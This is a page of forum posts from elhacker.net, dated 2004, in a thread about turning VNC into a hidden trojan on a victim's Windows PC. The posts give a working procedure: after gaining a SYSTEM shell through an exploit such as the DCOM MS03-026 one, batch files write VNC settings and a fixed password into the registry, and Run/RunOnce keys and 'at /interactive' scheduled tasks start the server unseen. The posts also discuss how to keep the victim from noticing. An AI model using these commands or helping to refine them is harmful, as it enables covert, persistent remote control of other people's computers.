elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34
311  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 11 Noviembre 2004, 21:08 pm
jejeje xnex leete un poco de ezine www.zine-store.com.ar

 buneo nada  no hay problema con mi pdf  por que he bajado los tuto de lo de troyanos indetectable  y me va  normal pero estos enlaces nada

salu2

Hmmm... el pfd lo he creado con el Adobe Acrobat 6.0 y creo q sólo puede ser visualizado con Adobe Acrobat Reader 5.0 o superior. Puede q tengas q actualizar tu versión.

Siento q te dé problemas...

Salu2
312  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 10 Noviembre 2004, 23:26 pm
NECESITO SABER CONCPTO DE SHELL Y COMO OBTENERLA

A ver... si llegas y te encuentras con q los dos posts q habías dejado preguntando esto mismo han "desaparecido", no se te puede haber ocurrido q alguien los ha mandado a donde corresponden: a la basura?? Yo te los borré pq no puedes preguntar estas cosas en el Foro de Hacking Avanzado.

Largo de aquí chaval!! Leete las normas antes de postear, q aquí no estamos para perder el tiempo con gentuza como tú.

x[ne]x, Último aviso!
313  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 25 Octubre 2004, 09:32 am
No sabes leer??  >:(

"Aunque existen muchas y diversas maneras de llegar a obtener una shell remota de cierta víctima, desde el uso de la Ingeniería Social hasta el uso de técnicas más avanzadas de intrusión en sistemas remotos, no es materia de explicación en este escrito cómo llegar a obtener una shell remota a través de todas ellas. Por lo tanto, damos por hecho que el atacante tiene los conocimientos mínimos para obtener una shell remota. "

Si no sabes explotar vulnerabilidades con exploits, este tutorial no es para ti...
314  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 24 Octubre 2004, 05:03 am
Ya está listo el Tutorial...

Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.pdf

http://www.geocities.com/unrayodesoul/gospel/Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.pdf
(Guardar destino como...)

Mirror: http://ns2.elhacker.net/timofonica/manus/Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.zip

Mirror2: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=65

Por favor, postead vuestras opiniones y sugerencias por si el escrito necesita ser modificado.

Gracias a todos.

Salu2
315  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 14 Octubre 2004, 11:15 am
Here i goooo....  ;D

El siguiente método para lograr instalar VNC como troyano en una víctima se compone de 4 pasos.


Paso 1 - Ejecutando el servidor VNC en la víctima

0) Obtener una shell remota de la víctima.
El siguiente método, está específicamente desarrollado para el caso de shell remota obtenida con el uso de un exploit. Esta shell remota, tendrá privilegios de SYSTEM y será por tanto, un poco especial.
Este método también es válido para una shell remota obtenida a partir de netcat, con privilegios de USUARIO, aunq en este último caso, se puede llegar a lo mismo sin tanto rodeo.

1) Subir los 3 archivos necesarios para la ejecución del servidor VNC. (De esto ya se ha hablado antes...)

2) Subir 2 archivos .bat

addRegNow.bat:
Código:
@echo off
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f

addReg.bat:
Código:
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\WINDOWS\system32\winvnc"

3) Agregar al registro de la víctima, la información de configuración del servidor VNC. Parte de esta información es la contraseña necesaria para admitir la conexión de clientes.
Vamos a agregar la información contenida en addRegNow.bat haciendo uso del comando at, es decir, programando una tarea.

Comprobamos la hora local de la víctima con net time \\nombreequipovictima

Programamos una tarea para los 2 minutos siguientes:
Código:
C:\WINDOWS\system32>at 0:58 "addregnow.bat"
at 0:58 "addregnow.bat"
Se ha agregado un nuevo trabajo con identificador = 1

Cuando llegue el momento, se ejecutará la tarea, no aparecerá ninguna ventana de ejecución del bat  ??? y se agregará toda la información contenida en addRegNow.bat en la siguiente clave de registro  ??? :

Citar
HKEY_USERS\.DEFAULT\Software\ORL

4) Cargar el ejecutable del servidor VNC llamando a winvnc.exe. Para ello, tenemos q programar una tarea y utilizar el parámetro /interactive

Citar
/interactive - Permite a la tarea interactuar con el escritorio del usuario cuya sesión coincide con el momento de ejecución de la tarea.

Si nos olvidamos de este detalle, winvnc.exe no correrá en el mismo entorno q el usuario víctima y no podremos acceder remotamente. Dará error de conexión...

Código:
C:\WINDOWS\system32>at 0:59 /interactive "winvnc.exe"
at 0:59 /interactive "winvnc.exe"
Se ha agregado un nuevo trabajo con identificador = 2

5) Después de comprobar con C:\at q no ha habido errores al ejecutar ambas tareas, podemos conectarnos remotamente con cualquier cliente vncviewer (si, cualquier!). Winvnc.exe aparecerá en la lista de tareas de la víctima bajo el Nombre de Usuario SYSTEM, pero magia potagia, se está ejecutando en el mismo entorno q el usuario víctima.


Paso 2 (Opcional) - Preparando la Instalación del servidor VNC como servicio

Si queremos garantizarnos futuros accesos con el cliente VNC, tenemos q seguir los siguientes puntos...

1) Añadir a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOne una clave con la ejecución de addReg.bat. De esta forma, cuando el usuario reinicie Windows, se cargará la información de configuración del servidor VNC en:

Citar
HKEY_CURRENT_USER\Software\ORL\WinVNC3

Os preguntaréis, ¿pq hago esto 2 veces? Pues pq sino creamos la clave de configuracion en HKEY_CURRENT_USER\Software\ORL\WinVNC3, cuando el usuario inicie Windows, el servidor VNC no irá a buscar la clave en HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3, sino a HKEY_CURRENT_USER\Software\ORL\WinVNC3 y como no la encontrará, saltará la ventana de propiedades pidiendo la contraseña... Es un poco lioso, pero hacedme caso...

Bien, con el siguiente comando, crearemos la clave de inicio q añadirá el contenido de addReg al registro de la víctima.

Código:
C:\WINDOWS\system32>REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v Load /t REG_SZ /d "C:\WINDOWS\system32\addreg.bat"

Esta clave sólo se ejecutará una única vez (RunOnce) en el siguiente inicio de Windows de la víctima...
Ahora, podemos esperar a q la víctima reinicie...


Paso 3 (Opcional) - Instalando el servidor VNC como servicio

0) La víctima reinicia y vuelve a iniciar Windows.

1) Cuando Windows se inicie, se ejecutará la clave de inicio en RunOnce y se cargará el contenido de addReg.bat:
En este momento, se cargará:
 - la información de configuración del servidor VNC en la clave por defecto HKEY_CURRENT_USER\Software\ORL
 - un clave de inicio en HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para q el servidor VNC arranque automáticamente en sucesivos inicios de Windows.
  - el servidor VNC, ejecutándose con privilegios de USUARIO. (Esto deriva del punto anterior...)

2) Nos podemos conectar remotamente con el cliente vncviewer...


Paso 4 (Opcional) - VNC Instalado como troyano

0) En el siguiente reinicio de la víctima y posterior inicio de Windows ya habrá desaparecido la clave en RunOnce (1 única ejecución) y el servidor VNC se ejecutará automáticamente desde la clave de inicio en HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

2) Nos podemos conectar remotamente con el cliente vncviewer...



Bueno, eso es todo. Aún quedan una par de cosas en el a¡re, q no soy capaz de explicar y q espero no me causen alguna sorpresa desagradable en el futuro:

Citar
Cuando yo dejé el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run y el usuario iniciaba Windows, primero cargaba el escritorio y luego cargaba el bat. Por tanto, era un canteo pq aparecía la pantalla de consola.
¿Por qué si dejas el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce carga primero el bat y luego el escritorio y por tanto, no aparece tal ventana de consola??

Citar
Cuando llegue el momento, se ejecutará la tarea, no aparecerá ninguna ventana de ejecución del bat  ??? y se agregará toda la información contenida en addRegNow.bat en la siguiente clave de registro  ??? :

Citar
HKEY_USERS\.DEFAULT\Software\ORL

Cuando Zhuzura lo pruebe y le dé el visto bueno, me pongo manos a la obra con el tutorial...

Me he dado cuenta de lo costoso q resulta llevar todo esto a cabo. Estoy seguro de q exiten por ahí algunos "software de control remoto" q no requieren la utilización del registro para el manejo de la contraseña y q sólo con subirlos a la víctima y ejecutarlos, ya nos podemos conectar remotamente. Pero bueno, ya q empecé este hilo con VNC, voy a terminarlo bien, de forma satisfecha. Y además, de toda experiencia se saca algo provechoso. Hasta ahora, no me atrevía a jugar con el registro y después de esto, ya me muevo mucho mejor...

Hala... ha sido un dia intenso. Me voy a dormir....

Salu2

Pd: El truco de usar el contexto INTERACTIVE para la shell con privilegios de SYSTEM es cortesía de LooKilleR @ Foro de HackxCrack. Gracias...
316  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 14 Octubre 2004, 05:36 am
Woahhhh!!! Genial Zhyzuraaaa, vaya idea feliz q te has currao!

Lo he probado y funciona!!!

Un simple apunte....

Cuando yo dejé el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run y el usuario iniciaba Windows, primero cargaba el escritorio y luego cargaba el bat. Por tanto, era un canteo pq aparecía la pantalla de consola.
¿Por qué si dejas el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce carga primero el bat y luego el escritorio y por tanto, no aparece tal ventana de consola??

Bueno, el caso es q funciona, así q ya puedo preparar el tutorial, jejejeje... le voy a meter un poco de arte para hacerlo!!

Otro apunte.... si entro a través del exploit Dcom para MS03-026, no hace falta reiniciar el equipo... al terminar la sesión con netcat, cae el servicio RPC y produce un services crash q obliga al sistema a reiniciar tras la cuenta atrás...

Citar
shutdown -i \\ip_de_la_maquina

Estás de coña?? Shutdown -i muestra el interfaz GUI para el apagado del sistema. Te has colao de parámetro...  :P


Tb tengo q probar otras cosas q me han contado algunos pajaritos de por ahi  ;) Puede q haya varias maneras de hacer q esto funcione...

Hala... en un par de dias publico el tutorial!!

Salu2

Pd: Soy feliz
317  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 13 Octubre 2004, 23:54 pm
 :D :D :D :D :D :D :D :D :D :D :D :D

Can't wait to test it!!

Muchas Gracias zhyzuraaaaa!!!!
318  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 12 Octubre 2004, 12:54 pm
hmm... "echo off". Vale, creo q así no se ven los comandos en sí, pero la ventana de ejecución de msdos sigue apareciendo, no??? Es decir, aparece la ventana toda negra...

Creooooooo... de todas formas, mañana pruebo!

Juas.... llevo 1 hora esperando a q contestes y me sueltas 1 frase!!!  ::) Ajum, esperaba un texto algo más extenso ;)

Bueno, mañana más y mejor.

Salu2
319  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 12 Octubre 2004, 11:12 am
Un apunte.

Cuando creas un nuevo archivo desde una shell remota con privilegios de SYSTEM lo crea como "archivo de sólo lectura" y no lo puedes luego borrar. Te dice acceso denegado...

La verdad, esta noche he comprobado q las shell remotas q devuelven los exploits no son tan "geniales" como pensaba...  :(

Hala, hala... a seguir con esto...

Salu2
320  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 12 Octubre 2004, 11:09 am
Buah, soy la hostia.... no contaban con mi astucia!!

Ya q me he dao cuenta de q podía añadir claves de registro con REG ADD, pero no así con reg import, he pensao.... ¿pq no añadir las claves a pelo con un bat?
Pero claroooo... desde un cuenta SYSTEM no se pueden añadir claves de registro en HKEY_CURRENT_USER\, aunq sí en HKEY_LOCAL_MACHINE\. Como necesitamos crear las claves de inicio del Winvnc en HKEY_CURRENT_USER\, no podemos hacerlo desde esta shell remota y la cosa va a resultar algo más enrevesada...

Procedimiento:

1) Copiar el siguiente bat desde la shell remota con privilegios de SYSTEM y guardarlo en c:\WINDOWS\system32\addreg.bat

Código:
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\WINDOWS\system32\winvnc"
start c:\WINDOWS\system32\winvnc.exe

2) Añadir una clave al registro para q cargue este bat cuando el usuario inicie Windows, de esta forma sí q tendrá privilegios para crear claves en HKEY_CURRENT_USER\. Recuerdo q por ahora sólo estamos en disposición de añadir claves en HKEY_LOCAL_MACHINE\, asi q ejecutamos la siguiente línea de comandos desde la shell remota:

Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Load /t REG_SZ /d "C:\WINDOWS\system32\addreg.bat"

3) Cuando el usuario reinicie el ordenador e inicie Windows, será un canteo, ya q aparecerá una ventana de msdos ejecutando en secuencia los comandos del archivo addreg.bat.

   - Primero, creará la carpeta ORL en el registro
   - Segundo, añadirá todas las claves de configuración del servidor VNC
   - Tercero, añadirá una clave de inicio en /Run para q VNC se ejecute con cada reinicio
   - Cuarto, ejecutará "start c:\WINDOWS\system32\winvnc.exe", esta vez sí, con privilegios de usuario!

Lo he probado y funciona...

Bueno, es un gran paso no creéis. Ahora sólo tenemos q preocuparnos de ocultar esa ejecución del *.bat. Lo primero q me ha venido a la cabeza es programar un pequeño código en c q ejecute todos esos comandos de msdos llamando a System(). Sin embargo, no sé cómo ocultarlo...
Es algo q llevo queriendo hacer desde hace tiempo. Incluso postee mi duda en la sección de Programación pero no me ayudaron lo suficiente :( ->

-> Ocultar programa Reverse Shell
http://foro.elhacker.net/index.php/topic,41470.0.html


Bueno, como véis esto avanza... Animooooo, más ideas???

Salu2

PD: Está qdando un hilo bastante l33t, a q sí??
Páginas: 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines